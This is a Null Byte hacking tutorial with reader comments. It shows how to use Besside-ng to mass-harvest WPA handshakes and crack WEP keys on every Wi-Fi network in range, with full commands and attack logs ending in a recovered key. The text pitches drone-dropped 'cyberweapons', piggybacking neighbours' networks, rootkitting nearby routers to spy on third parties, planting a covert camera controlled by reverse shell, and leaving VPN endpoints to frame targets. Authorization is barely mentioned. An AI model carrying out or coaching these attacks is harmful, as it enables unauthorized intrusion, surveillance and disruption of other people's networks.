How to Hack Wi-Fi: Automating Wi-Fi Hacking with Besside-ng

Automating Wi-Fi Hacking with Besside-ng

Besside-ng is the hidden gem of the Aircrack-ng suite of Wi-Fi hacking tools. When run with a wireless network adapter capable of packet injection, Besside-ng can harvest WPA handshakes from any network with an active user — and crack WEP passwords outright. Unlike many tools, it requires no special dependencies and can be run via SSH, making it easy to deploy remotely.

In my opinion, it's one of the most powerful Wi-Fi hacking tools currently available. First written in 2010 in C, Besside-ng is an incredibly aggressive and persistent WPA handshake mass-harvester and WEP cracker. It features customizable options to upload handshakes to distributed WPA password crackers, which, on average, crack over 18% of networks submitted automatically.

Sound Simple? Let's Look at How It Works

Encrypted Wi-Fi networks come in two primary flavors, WEP and WPA.

While WEP can be broken easily, WPA and WPA2 networks require us to record a "handshake" when a device connects to the target network. Then, we try to guess the password by having a program try many possible passwords against that recorded handshake. If we guess the correct password, we'll know, so having a good password list and a fast processor used to be essential to cracking WPA networks.

In 2020, we have more options. To save time, we can submit these handshakes to a distributed cracking service or a more powerful machine, which will automatically try all of the world's most common and shitty passwords for us. Since many people choose bad passwords, we will get back around 10–20% of our recorded handshakes networks with cracked passwords.

To record a precious handshake from a W-Fi network, an authorized device like the target's smartphone or laptop must connect to the network. Besside-ng scans the airwaves for any devices connected to a Wi-Fi network, then injects a packet that disconnects the device from that network for a brief moment.

How a deauth attack works to harvest WPA keys.

The targeted device will reconnect automatically, and we will record the handshake when it does. It's terrifyingly easy, and during peak activity hours in a high-density area, Besside-ng can harvest every Wi-Fi network in use within the range of your antenna. Keep in mind, if your target has an always-connected smart device, you can pretty much always grab a handshake for their network.

Why a 2010 Tool Is Still Powerful in 2020

Since 2010, some significant changes have made Besside-ng relevant again. Small, cheap computers like the Raspberry Pi Zero W and the Raspberry Pi 3 feature the ability to add powerful network adapters in addition to its internal Wi-Fi card, all while keeping the cost below $70 to run a remote headless attack suite.

So what kind of applications can we use Besside-ng for? Well, lots. But let's just go over a few of the best use-cases quickly so you get an idea.

1. Cheap Cyberweapons

Cheap, "fire-and-forget" cyberweapons, designed to harvest and crack WPA networks in a given area and then be discarded, are small and light enough to be left in an Altoids tin in the trash, dropped by a small drone on a roof, or tossed over a fence by hand. The same devices can also be used to deliberately jam or attempt to exploit the router of any nearby Wi-Fi network with a bad password.

An attacker would only need a directional antenna (like this one) aimed at the rogue device to communicate with and control it. The rapid way in which Besside-ng builds a list of available Wi-Fi connections to switch between allows a rogue device to develop a "beachhead" into the neighboring wireless environment. This doubles as a list of exploitable routers to pivot through once the WPA password is cracked. Once a rogue device is in place and cracks a few reliable networks, the hacker is free to go home and control the device via a reverse shell.

A long-range, directional WPA harvester designed for scanning high-rise buildings. Image by Kody/Null Byte

2. Anonymous Internet That Piggybacks Nearby Networks

Emergency set up of workstations when rapidly shifting locations can be aided by using Besside-ng to acquire several connection options in under an hour. A small team needing to rapidly set up an internet-connected forward operating position in an opportunistic workspace (like working out of a garage or public space) can piggyback off existing nearby infrastructure to reduce their footprint.

While it's easy to get access, it is critical to use Tor or VPNs properly, and spin the MAC address of any devices used each time they connect to such a network. If you need a network — any network — to get working, this is your program. This technique can also be used to quickly set up an environment for rogue devices to operate in, allow for a LAN dead drop between two users over a privately owned network, or impersonate users of nearby networks to mask activity.

Two Besside-ng sessions running in parallel to gain internet access for this workstation. This Kali box will set itself up, after initially being tethered while it cracks its first networks. Image by Kody/Null Byte

3. Electronic Surveillance Through Router Rootkitting

Setups using kismet drones or other "flytrap-like" methods of electronic surveillance are a great way to avoid having to drop an evil Pi from a drone — or even be anywhere near your target after the initial exploit.

The opportunistic nature of Besside-ng allows it to build up a steady list of routers for a hacker to attempt to exploit. Once a router is successfully compromised, custom router firmware can convert a nearby neighbor's router into a device to spy on a third party's Wi-Fi usage or forward interesting packets. Criminals hackers even leave behind VPN endpoints in exploited routers to provide cover for committing crimes, framing the target, or charging other criminals to use the VPN network.

Besside-ng run on a headless Raspberry Pi. Image by Kody/Null Byte

An Operation with Besside-ng

To show off some of the techniques above, we'll go over an applied scenario of using Besside-ng. However, you can follow along on any Kali Linux device or virtual machine.

Our training mission will be to provide Wi-Fi coverage to support an operation in a targeted building. Doing so allows the placement and operation of a small improvised rogue device called a Buck-Eye, a Kali-based Wi-Fi-connected surveillance camera running on a Raspberry Pi Zero W.

Placing a device like this allows us to do useful things like conduct visual and electronic surveillance of an area, extend VoIP coverage to places where cellular coverage may be blocked, pivot deeper into targeted systems, and perform other helpful functions.

To be controlled, the device must be connected to a Wi-Fi network. After it's placed, you can control it from your long-range connection until you can migrate it to a nearby cracked network. We'll be running Besside-ng via SSH on the Buck-Eye once it is placed to grab a nearby network password.

The Buck-Eye is a little rogue device that runs Kali Linux on a Pi Zero W to create an offensive spy package capable of cracking its own networks. It's so named because it provides an eye on the target without costing many bucks. Image by Kody/Null Byte

Since our Buck-Eye runs Kali Linux, Besside-ng can ensure tactical network availability by scanning for and helping to build a list of backdoor Wi-Fi connections to spider through to ensure survivability in the event a primary Wi-Fi connection goes down.

What You'll Need to Get Started

Besside-ng runs on Kali Linux and is particularly effective on the Raspberry Pi 3 or Pi Zero W. You'll need the Aircrack-ng suite to run the attack, and your Kali system should be updated by running apt update.

A Raspberry Pi Zero W setup supporting long-range WPA handshake harvesting. Image by Kody/Null Byte

I'll be using a Raspberry Pi running Kali Linux. But the tool will work on any Kali Linux system — here are a few builds we recommend:

Our Kali Linux build is the easiest way to get started. For hardware, the only real requirement is a wireless network adapter capable of packet injection. (It should be noted that our testing has found bugs when using the Atheros AR9271 chipset.)

Step 1: Verify You Have the Aircrack-ng Suite

In our demonstration, I will be connected to our Raspberry Pi build running Kali Linux via SSH, but this will work the same on any Kali install. First, let's make sure we have the Aircrack-ng suite updated. Type man aircrack-ng to check if it already exists on the system.

~$ man aircrack-ng

AIRCRACK-NG(1)           General Commands Manual           AIRCRACK-NG(1)

NAME
       aircrack-ng - a 802.11 WEP / WPA-PSK key cracker

SYNOPSIS
       aircrack-ng [options] <input file(s)>

DESCRIPTION
       aircrack-ng  is  an 802.11 WEP, 802.11i WPA/WPA2, and 802.11w WPA2
       key cracking program.

       It can recover the WEP key once enough encrypted packets have been
       captured  with airodump-ng. This part of the aircrack-ng suite de‐
       termines the WEP key using  two  fundamental  methods.  The  first
       method is via the PTW approach (Pyshkin, Tews, Weinmann). The main
       advantage of the PTW approach is that very few  data  packets  are
       required  to crack the WEP key. The second method is the FMS/KoreK
       method. The FMS/KoreK method incorporates various statistical  at‐
       tacks  to  discover the WEP key and uses these in combination with
       brute forcing.

       Additionally, the program offers a dictionary method for determin‐
       ing the WEP key. For cracking WPA/WPA2 pre-shared keys, a wordlist
       (file or stdin) or an airolib-ng has to be used.

INPUT FILES
       Capture files (.cap, .pcap), IVS (.ivs) or  Hashcat  HCCAPX  files
       (.hccapx)

OPTIONS
       Common options:

       -a <amode>
              Force  the  attack mode: 1 or wep for WEP (802.11) and 2 or
              wpa for WPA/WPA2 PSK (802.11i and 802.11w).

       -e <essid>
              Select the target network based on the ESSID.  This  option
              is  also  required for WPA cracking if the SSID is cloaked.
              For    SSID    containing    special    characters,     see
              https://www.aircrack-ng.org/doku.php?id=faq#how_to_use_spa‐
              ces_double_quote_and_single_quote_etc_in_ap_names

       -b <bssid> or --bssid <bssid>
              Select the target network based on the access point MAC ad‐
              dress.

       -p <nbcpu>
              Set  this  option to the number of CPUs to use (only avail‐
              able on SMP systems) for cracking  the  key/passphrase.  By
              default, it uses all available CPUs

       -q     If set, no status information is displayed.

       -C <macs> or --combine <macs>
              Merges all those APs MAC (separated by a comma) into a vir‐
              tual one.

       -l <file>
              Write the key into a file. Overwrites the file  if  it  al‐
              ready exists.

       Static WEP cracking options:

       -c     Search alpha-numeric characters only.

       -t     Search binary coded decimal characters only.

       -h     Search the numeric key for Fritz!BOX

       -d <mask> or --debug <mask>
              Specify mask of the key. For example: A1:XX:CF

       -m <maddr>
              Only  keep  the IVs coming from packets that match this MAC
              address. Alternatively, use -m ff:ff:ff:ff:ff:ff to use all
              and every IVs, regardless of the network (this disables ES‐
              SID and BSSID filtering).

       -n <nbits>
              Specify the length of the key: 64 for 40-bit WEP,  128  for
              104-bit  WEP,  etc.,  until 512 bits of length. The default
              value is 128.

       -i <index>
              Only keep the IVs that have this key index (1  to  4).  The
              default  behavior is to ignore the key index in the packet,
              and use the IV regardless.

       -f <fudge>
              By default, this parameter is set to 2. Use a higher  value
              to  increase  the bruteforce level: cracking will take more
              time, but with a higher likelihood of success.

       -k <korek>
              There are 17 KoreK attacks. Sometimes one attack creates  a
              huge false positive that prevents the key from being found,
              even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable
              each attack selectively.

       -x or -x0
              Disable last keybytes bruteforce (not advised).

       -x1    Enable last keybyte bruteforcing (default)

       -x2    Enable last two keybytes bruteforcing.

       -X     Disable bruteforce multithreading (SMP only).

       -s     Shows ASCII version of the key at the right of the screen.

       -y     This  is  an  experimental  single brute-force attack which
              should only be used when the  standard  attack  mode  fails
              with more than one million IVs.

       -z     Uses  PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Wein‐
              mann) attack (default attack).

       -P <num> or --ptw-debug <num>
              PTW debug: 1 Disable klein, 2 PTW.

       -K     Use KoreK attacks instead of PTW.

       -D or --wep-decloak
              WEP decloak mode.

       -1 or --oneshot
              Run only 1 try to crack key with PTW.

       -M <num>

       -V or --visual-inspection
              Run in visual inspection mode. Can only be used when  using
              KoreK.

       WEP and WPA-PSK cracking options

       -w <words>
              Path  to a dictionary file for wpa cracking. Separate file‐
              names with comma when using multiple dictionaries.  Specify
              "-"   to   use   stdin.   Here  is  a  list  of  wordlists:
              https://www.aircrack-
              ng.org/doku.php?id=faq#where_can_i_find_good_wordlists   In
              order to use a dictionary with hexadecimal  values,  prefix
              the  dictionary  with  "h:".  Each byte in each key must be
              separated by ':'. When using with WEP, key length should be
              specified using -n.

       -N <file> or --new-session <file>
              Create  a  new cracking session. It allows one to interrupt
              cracking session and restart at a later time (using  -R  or
              --restore-session). Status files are saved every 5 minutes.
              It does not overwrite existing session file.

       -R <file> or --restore-session <file>
              Restore and continue a previously saved  cracking  session.
              This  parameter  is  to  be  used alone, no other parameter
              should be specified when starting aircrack-ng (all the  re‐
              quired information is in the session file).

       WPA-PSK options:

       -E <file>
              Create  Elcomsoft  Wireless Security Auditor (EWSA) Project
              file v3.02.

       -j <file>
              Create Hashcat v3.6+ Capture file (HCCAPX).

       -J <file>
              Create Hashcat Capture file (HCCAP).

       -S     WPA cracking speed test.

       -Z <sec>
              WPA cracking speed test execution length in seconds.

       -r <database>
              Path to the airolib-ng database. Cannot be used with '-w'.

       SIMD selection:

       --simd=<option>
              Aircrack-ng automatically loads and uses the fastest  opti‐
              mization based on instructions available for your CPU. This
              options allows one to force another  optimization.  Choices
              depend  on the CPU and the following are all the possibili‐
              ties that may be  compiled  regardless  of  the  CPU  type:
              generic,  sse2,  avx,  avx2,  avx512, neon, asimd, altivec,
              power8.

       --simd-list
              Shows a list of the available SIMD architectures, separated
              by a space character. Aircrack-ng automatically selects the
              fastest optimization and thus it is rarely  needed  to  use
              this option. Use case would be for testing purposes or when
              a "lower" optimization, such as "generic", is  faster  than
              the  automatically  selected one. Before forcing a SIMD ar‐
              chitecture, verify that the  instruction  is  supported  by
              your CPU, using -u.

       Other options:

       -H or --help
              Show help screen

       -u or --cpu-detect
              Provide information on the number of CPUs and SIMD support

AUTHOR
       This  manual page was written by Adam Cecile <gandalf@le-vert.net>
       for the Debian system (but may be used by others).  Permission  is
       granted  to copy, distribute and/or modify this document under the
       terms of the GNU General Public License, Version 2  or  any  later
       version  published  by the Free Software Foundation On Debian sys‐
       tems, the complete text of the GNU General Public License  can  be
       found in /usr/share/common-licenses/GPL.

SEE ALSO
       airbase-ng(8)
       aireplay-ng(8)
       airmon-ng(8)
       airodump-ng(8)
       airodump-ng-oui-update(8)
       airserv-ng(8)
       airtun-ng(8)
       besside-ng(8)
       easside-ng(8)
       tkiptun-ng(8)
       wesside-ng(8)
       airdecap-ng(1)
       airdecloak-ng(1)
       airolib-ng(1)
       besside-ng-crawler(1)
       buddy-ng(1)
       ivstools(1)
       kstats(1)
       makeivs-ng(1)
       packetforge-ng(1)
       wpaclean(1)
       airventriloquist(8)

Version 1.6.0                  January 2020                AIRCRACK-NG(1)

If not, or if we want to make sure it's updated, let's run the following command.

~$ sudo apt install aircrack-ng

Reading package lists... Done
Building dependency tree
Reading state information... Done
aircrack-ng is already the newest version (1:1.6-4).
aircrack-ng set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 17 not upgraded.

Once we confirm we have the suite and it's updated, we can proceed with the attack.

Step 2: Identify Your Attack Antenna & Let It Rip

On Kali Linux, you can type iwconfig to see a list of available antennas. If you are connecting to your Kali Linux device remotely via SSH or VNC, now is a great time to note which antenna is hosting your data connection (the one with the IP address assigned).

Starting Besside-ng on the wrong antenna will instantly sever your remote connection and lock you out of the device until you restart if you are connected via SSH. Here we see my attack antenna is idle while my command and control antenna is attached to a network.

~$ sudo iwconfig

wlan0   IEEE 802.11bgn ESSID:"████████████████████"
        Mode:Managed Frequency:2.462 GHz  Access Point: ████████████████████
        Bit Rate=72 Mb/s   Tx-Power=1496 dBm
        Retry short limit:7   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:on
        Link Quality=60/70   Signal level=50 dBm
        Rx invalid nvid:0   Rx invalid crypt:0   Rx invalid frag:0
        Tx excessive retries:0   Invalid misc:0   Missed beacon:0

lo      no wireless extensions.

eth0    no wireless extensions.

wlan1   IEEE 802.11bgn ESSID:off/any
        Mode:Managed   Access Point: Not-Associated   Tx-Power=1496 dBm
        Retry short limit:7   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:off

If you are not on Kali, you can run ifconfig to see attached antennas and look for "wlan" to spot the wireless antennas. In this case, wlan1 is my attack antenna.

Step 3: Configure Your Attack & Let's Ride

Besside-ng is dead simple. To learn more about it, visit it's man page.

~$ man besside-ng

BESSIDE-NG(8)            System Manager's Manual            BESSIDE-NG(8)

NAME
       besside-ng  - crack a WEP or WPA key without user intervention and
       collaborate with WPA cracking statistics

SYNOPSIS
       besside-ng [options] <interface>

DESCRIPTION
       besside-ng is a tool which will crack  all  the  WEP  networks  in
       range  and  log all the WPA handshakes.  WPA handshakes can be up‐
       loaded to the online  cracking  service  at  wpa.darkircop.org.
       Wpa.darkircop.com  also  provides useful statistics based on user-
       submitted capture files about the feasibility of WPA cracking.

       -b <target mac>
              Specifies the target's BSSID

       -s <WPA server>
              Where to upload capture file for cracking. A good choice is
              wpa.darkircop.org

       -c <chan>
              Channel lock

       -p <pps>
              Packages per second to send (flood rate).

       -W     Crack only WPA networks

       -v     Verbose  mode.  Use -vv for more verbose, -vv for even more
              and so on.

       -h     Help screen

AUTHOR
       This manual page was written by David Francos  Cuartero.   Permis‐
       sion  is  granted  to copy, distribute and/or modify this document
       under the terms of the GNU General Public License,  Version  2  or
       any later version published by the Free Software Foundation On De‐
       bian systems, the complete text of the GNU General Public  License
       can be found in /usr/share/common-licenses/GPL.

SEE ALSO
       airbase-ng(8)
       aireplay-ng(8)
       airmon-ng(8)
       airodump-ng(8)
       airodump-ng-oui-update(8)
       airserv-ng(8)
       airtun-ng(8)
       easside-ng(8)
       tkiptun-ng(8)
       wesside-ng(8)
       aircrack-ng(1)
       airdecap-ng(1)
       airdecloak-ng(1)
       airolib-ng(1)
       besside-ng-crawler(1)
       buddy-ng(1)
       ivstools(1)
       kstats(1)
       makeivs-ng(1)
       packetforge-ng(1)
       wpaclean(1)
       airventriloquist(8)

Version 1.6.0                  January 2020                 BESSIDE-NG(8)

With the attack antenna known as wlan1, simply type the following command to initiate a wide-area attack against all detected APs. While it helps to put an adapter in monitor mode, Besside-ng will take care of that.

~$ sudo besside-ng wlan1 -vv

[10:07:47] mac ██:██:██:██:██:██
[10:07:47] Let's ride
[10:07:47] Resuming from besside-ng
[10:07:47] Found AP ████████████████ [██████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████████████████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [██████████████] chan 0 crypto WPA dbm 0
[10:07:47] Appending to wpa.cap
[10:07:47] Appemding to wep.cap
[10:07:47] Logging to besside.log
[10:07:47] Found AP ████████████████ [██████] chan 1 crypto WPA dbm -01
[10:07:47] Found AP ████████████████ [██████] chan 2 crypto WPA dbm -04
[10:07:47] Found AP ████████████████ [████████] chan 1 crypto WPA dbm -06
[10:07:47] Found AP ████████████████ [██████████████████] chan 1 crypto WPA dbm -00
[10:07:48] Found AP ████████████████ [████████] chan 3 crypto WPA dbm -56
[10:07:48] Found AP ████████████████ [██████████] chan 4 crypto WPA dbm -79
[10:07:49] Found AP ████████████████ [████████████] chan 7 crypto WPA dbm -50
[10:07:50] Found AP ████████████████ [████] chan 9 crypto WPA dbm -49
[10:07:50] Found AP ████████████████ [██████] chan 11 crypto WPA dbm -83
[10:07:51] Found AP ████████████████ [██████] chan 11 crypto WPA dbm -72
[10:07:51] Found AP ████████████████ [████████] chan 1 crypto WPA dbm -59
[10:07:52] Found AP ████████████████ [████████] chan 3 crypto WPA dbm -63
[10:07:52] Found AP ████████████████ [████] chan 4 crypto WPA dbm -53
[10:07:53] Found AP ████████████████ [████████████████] chan 6 crypto WPA dbm -65
[10:07:53] Found AP ████████████████ [██████████████████████] chan 7 crypto WPA dbm -66
[10:07:54] - Scanning chan 11

Shit will proceed to hit the fan, with the script automatically throwing the wireless card into monitor mode and scanning all channels for targets. On the first run or two, you may get a "no child process" error. Just run the sudo besside-ng wlan1 command again, and it will start. To see everything the script is doing, add the -vv argument at the end. You'll see the blistering speed at which Besside-ng finds, prioritizes, pings, and attacks networks.

Step 4: Clarify the Operation During Attack Runs

In a target-rich environment, Besside-ng will run continuously for days or weeks, with my current endurance record over one week of continuous attacking. While the attack runs, it will prioritize WEP networks as they can be wholly compromised from within the script. As such, Besside-ng may focus too heavily on WEP and slow down the attack. You can prevent this by only attacking WPA networks by adding the -W argument to the command, as the help page suggests.

~$ sudo besside-ng -h

  Besside-ng 1.6  - (C) 2010 Andrea Bittau
  https://www.aircrack-ng.org

  Usage: besside-ng [options] <interface>

  Options:

       -b <victim mac>      : Victim BSSID
       -R <victim ap regex> : Victim ESSID regex
       -s <WPA server>      : Upload wpa.cap for cracking
       -c <chan>            : chanlock
       -p <pps>             : flood rate
       -W                   : WPA only
       -v                   : verbose, -vv for more, etc.
       -h                   : This help screen

This script will, by default, scan all channels, which makes it too slow for wardriving or null-byte.wonderhowto.com/how-to/wardrive-android-phone-map-vulnerable-networks-0176136/ to capture handshakes since, by the time the master list of APs to attack is built and prioritized, you're a block away.

This can be mitigated in part by adding the -c argument and followed by a channel number to stay locked on. Doing so builds the target list much more quickly, at the expense of only attacking one channel. Run Airodump-ng to determine the best channels to lock to.

If you wish to attack a particular network, you can add the -b argument followed by the BSSID of the target to specify which access point you want to attack. This is useful for networks with many APs under the same name (extended service sets), which may have many identically named APs that all appear as the same Wi-Fi network. Adding this argument allows you to focus your attack on a particular AP under the umbrella of the network and make faster progress on cracking a WEP key.

Step 5: Auto-Crack Passwords from WPA.cap During an Attack

Soon, you will begin to gather WPA handshakes, potentially a lot of them. They will be automatically appended to the wpa.cap file, which is created in your home directory if it doesn't already exist. WEP packets are similarly saved to a file called wep.cap, both of which can be run in Aircrack-ng to attempt to get the password.

[10:52:55] Crappy connection - ████████ unreachable got 0/10 (100% loss) [-85 dbm]
[10:53:12] Got necessary WFA handshake info for ████████
[10:53:12] Uploaded WPA handshake to wpa.darkircop.org
[10:53:12] Pwned network ████████ in 0:07 mins:secs
[10:53:12] TO-OWN [████████ ████████████████ ████████ ████  ████████████████████]

We can run these in Aircrack-ng against our own password list, but electricity is expensive, and brute-force attacks are very dull. Instead, we can use the -s argument to specify a WPA server to upload the handshakes. This will let a distributed service like wpa.darkircop.org crack the passwords for us.

Step 6: Auto-Crack Passwords from WEP.cap During an Attack

If Besside-ng detects a WEP network in range, it will cyberbully the hell out of it. You can open a second terminal window and begin attacking a WEP network while Besside-ng collects unique IVs Aircrack-ng needs to crack the network.

In a terminal, select the network to attack by typing the following. A list of all WEP captures by Besside-ng will be displayed.

~$ sudo aircrack-ng ./wep.cap

Opening /Users/████████/web.cap
Read 75862 packets.

   #  BSSID             ESSID               Encryption

   1  ████████████████  ████████████████    WEP (28122 IVs)
   2  ████████████████                      WEP (1012 IVs)
   3  ████████████████                      WPA (0 handshake)
   4  ████████████████                      WEP (108 IVs)
   5  ████████████████                      WEP (4 IVs)
   6  ████████████████                      WPA (0 handshake)
   7  ████████████████                      WPA (0 handshake)
   8  ████████████████                      WEP (7 IVs)
   9  ████████████████                      WPA (0 handshake)
  10  ████████████████                      WEP (7 IVs)
  11  ████████████████                      WPA (0 handshake)
  12  ████████████████                      WEP (6 IVs)
  13  ████████████████  ██████████████      WEP (6 IVs)
  14  ████████████████                      WEP (13 IVs)
  15  ████████████████  ███████████████     WEP (19984 IVs)
  16  ████████████████                      WEP (22 IVs)
  17  ████████████████  ████████████████    WEP (44 IVs)
  18  ████████████████  ████████████        WEP (20240 IVs)
  19  ████████████████                      WEP (12 IVs)
  20  ████████████████  ████████            WEP (1 IVs)
  21  ████████████████                      WEP (1 IVs)
  22  ████████████████  ████████            WEP (749 IVs)
  23  ████████████████  ████████            WEP (105 IVs)
  24  ████████████████  ████████            WEP (1 IVs)
  25  ████████████████  ████████████████    WEP (1578 IVs)
  26  ████████████████                      WEP (9 IVs)
  27  ████████████████  ███████████████████ WEP (7 IVs)
  28  ████████████████  ██████████████████  WEP (1 IVs)
  29  ████████████████  ██████████████      WEP (2 IVs)
  30  ████████████████  ████████████████    WEP (3 IVs)
  31  ████████████████  ████████            WEP (3052 IVs)
  32  ████████████████  ██████              WEP (4 IVs)

Index number of target networks ?

Select the number of the network Besside-ng will target, and a beautiful symphony of math ensues as Aircrack-ng attacks the encryption.

Index number of target networks ? 18

Aircrack-ng 1.2 rc4

                                                            [00:00:07] Tested 794881 keys (got 25521 IVs)

KB      depth   byte(vote)
 0      0/  1   21(38912) AC(34560) 5B(32768) 1F(31744) C8(31744) 0D(30976) 63(30976) 8C(30976) 82(30720) 09(30464) 69(30464) A0(30464) FC(30464)
 1      2/  3   78(32000) F5(31744) FE(30976) 06(30464) 3E(30464) 9F(30464) AC(30464) C6(30464) D2(30464) 38(30208) 43(30208) 4D(30208) 1C(22952)
 2      0/  1   FB(36352) 33(32768) 0F(32256) 37(31744) 2D(30976) DA(30720) 0D(30208) 61(30208) 9E(30208) AD(30208) C5(30208) F9(30208) 45(29952)
 3      1/  2   4D(34304) A0(32512) 18(31744) 81(30406) C7(30464) F9(30464) 87(30208) 99(30208) A6(30208) D1(30208) F1(30208) 2B(29952) 5B(29952)
 4      1/  2   37(34304) EB(32256) C5(31488) AA(30720) EE(30208) FA(30208) 4A(29952) B3(29952) A7(29696) 61(29440) D0(29184) DB(21184) ED(28928)
 5      5/  6   D4(31488) 8F(30976) EE(30720) 3C(30208) 7D(30208) C4(30208) 77(29952) B8(29952) 5A(29696) B3(29440) 1C(29184) 61(29184) 82(29184)
 6      3/  4   D5(31488) 96(30976) 2B(30208) 90(30208) 6B(30464) AB(30464) CE(30208) F0(30208) FE(30208) 1D(29696) 33(29696) 39(29696) B8(29696)
 7     14/ 15   F6(30208) C3(29952) E0(29952) 4A(29696) AF(29696) 32(29440) 50(29440) 31(29184) 7A(29184) B6(29184) BE(29184) EE(29184) 2E(28928)
 8      3/  4   70(30976) 6B(30720) 47(30464) DF(30464) 1F(30208) 32(30208) 7F(30208) 9F(30208) B7(30208) 9C(29696) BF(29696) C3(29696) FF(26969)
 9      0/  1   AB(33536) 1F(31488) 23(31488) C6(31488) 6D(31232) BD(31232) D8(31232) 63(30976) 60(30720) 16(30464) 59(30464) A5(30208) 05(29952)
10      4/  8   19(31232) 39(30976) E4(30976) FA(30976) 0F(30464) 44(30464) D3(30464) A2(30208) A6(29952) 09(29696) 25(29696) 50(29696) 54(29696)
11      2/  3   C7(32000) E5(30976) 45(30464) 87(30464) F7(30464) E9(30208) 0B(29952) 41(29952) AD(29952) 31(29696) 42(29696) 9A(29696) D9(29696)
12      1/  2   37(32256) FD(31744) 8E(31232) E7(30720) FA(30720) 68(30464) D1(30208) 45(29952) 4F(29952) 5D(29952) 65(29952) 09(29696) 39(29696)

Aircrack-ng will re-try the attack automatically every 5,000 IVs as more packets are captured by Besside-ng.

KB      depth   byte(vote)
 0      7/  8   99(5120) D4(4864) 00(4864) 8B(4864) 07(4864) FB(4864) 11(4864) 03(4608) EC(4608) 17(4608) 18(4608) E6(4608) D9(4608)
 1     10/ 14   B2(4864) 6D(4608) 99(4608) 05(4608) A9(4352) 91(4352) 95(4352) B4(4352) 1B(4352) A7(4352) DC(4096) 1D(4096) FC(4096)
 2     14/ 15   2D(4608) D6(4352) BD(4352) CF(4352) 0D(4352) 10(4352) 86(4352) B2(4352) B1(4352) FF(4352) 79(4096) D4(4096) 03(4096)
 3     15/  3   07(4352) 4E(4352) DB(4352) 09(4352) 58(4352) 6D(4096) 25(4096) 0F(4096) 44(4096) 8B(4096) 15(4096) 85(4096) EA(4096)
 4     17/  4   95(4352) 72(4352) CC(4352) 55(4352) C2(4096) 19(4096) 2D(4096) 2F(4096) 33(4096) FF(4096) 05(4096) 07(4096) F2(4096)

Failed. Next try with 5000 IVs.

This repeats until we defeat the encryption and gain the key.

KB      depth   byte(vote)
 0      0/ 15   21(26112) E1(25600) F9(25088) B9(24832) BA(24576) A2(24320) 19(24320) 10(24064) 63(23808) DA(23552) 8C(23552) BD(23552) ED(23552)
 1     11/ 14   BA(24064) 95(23808) 59(23808) 16(23552) 62(23552) 0A(23552) 72(23552) B7(23552) 43(23552) 68(23552) A3(23552) 9D(23552) E5(23296)
 2      0/  3   20(28416) 7A(26624) 91(25856) D4(25344) 2C(25344) DC(25088) 43(25088) 0D(24832) B3(24832) 07(24832) A7(24576) 28(24064) 9A(24064)
 3      0/  1   44(32256) 1C(25856) 82(25600) C0(25088) 2B(24832) 06(24832) 7E(24576) BF(24320) 04(24320) D6(24320) 54(24064) 31(24064) A9(24064)
 4      1/ 25   00(25344) 7C(25088) 45(24832) E9(24832) 36(24832) 6C(24576) AF(24320) 25(24064) 17(23808) 3B(23808) 8C(23552) A1(23296) 4F(23296)

                    KEY FOUND! [ ████████████████ ] (ASCII: █████████ )
       Decrypted correctly: 100%

Step 7: Troubleshoot Interruptions

Besside-ng experiences two main types of glitches — "no child process" and "network is down." These can be related to your wireless network adapter.

No child process can be fixed by re-running the Besside-ng command, most of the time. Network is down is often caused by the WPA supplicant process throwing your card out of monitor mode. To solve this problem, you can run Airmon-ng:

~$ sudo airmon-ng check kill

This will kill any troublesome processes for monitor mode, but it will also kill any other Wi-Fi interfaces, so be careful if you are SSHed into your device that way.

Besside-ng vs. Wifite

Besside-ng is not the only tool to target this niche. Suites like Wifite can also be used to attack WPA and WEP networks in automated ways. Wifite includes the added function of attacking WPS setup PINs.

While Wifite certainly provides better situational awareness of wireless targets around you, not everyone has time to wait to hit each network with every attack in the book, as Wifite likes to do. In addition, the WPS setup PIN attack is aging poorly and often no longer works, which wastes a lot of time. These attacks focus on different types of automation, with Wifite throwing everything and the kitchen sink at a particular network or networks, and Besside-ng going ham over any networks that dare exist nearby.

The problem with Wifite is that it sucks because it takes forever, and I rarely have success with it nowadays. By comparison, Besside-ng remains blisteringly fast into the foreseeable future.

Warning: Besside-ng Is Loud & Leaves a Ton of Evidence

While Besside-ng is a phenomenal tool, the nature of the attack means it interacts with every access point in range. This leaves distinctive logs in each router targeted, meaning this attack has the subtlety of running around and smacking every device off of every Wi-Fi connection in range. It can be mitigated by focusing your attack on a particular AP. The technique usually does not disrupt regular network use and operation, but can reveal your device MAC address or physical location if run against a well-defended target.

Thanks for reading, and make sure to keep an eye on Null Byte for more hacking tutorials. You can ask me questions here or on Twitter @KodyKinzie or @NullByte.

Want to start making money as a white hat hacker? Jump-start your white-hat hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from ethical hacking professionals.

Buy Now (90% off) >

Cover photo and GIF by Kody/Null Byte

Our Best Hacking & Security Guides

New Null Byte posts — delivered straight to your inbox.

17 Comments

Really great tutorial .
For my opinion its the best tutorial from you till now.
Keep it up !

I feel the same about this one! This is definitely one of my favorite tools.

I met a problem:
WPA handshake upload failed
Pwned network XXXXX in 48:28 mins:sec
TO-OWN OWNED XXXXX UNREACH
All neighbors owned
Dying...

XXXXX is the network name
What does this mean??
How can i solve it??
Hope there will be a solution.
Thanks

delete wpa.cap file and the log file

Another problem is that the wpa.darkircop.org can not be reached.
Will this be the problem??
Thanks

Having problems with a "crappy connection 100% loss" error on everything I scan. Doesn't matter where the router is (I even put the antenna right next to it at one point out of frustration)

Raspberry Pi 3 build
Panda pau05 antenna

Tried it with an Alfa antenna as well with the same results. Thoughts?

Well, I've got a Kali Live with Persistance USB that I tried out on my laptop, and both antennas work fine with besside-ng. So I'm wondering if the problem is with the Raspberry Pi. ??

is your system a virtual machine, raspberry pi, or installed onto a partition?

Do you recommend doing this on a raspberry pi that doesn't have a heat Sink? Think it'll probably wear out

No and I agree

It depends on what method you use. If you're attacking WEP, besside just cracks it. If you're attacking WPA, then yes, it's a brute-force dictionary attack

Cannot get my head round this. Anyone can help?

$sudo besside-ng device
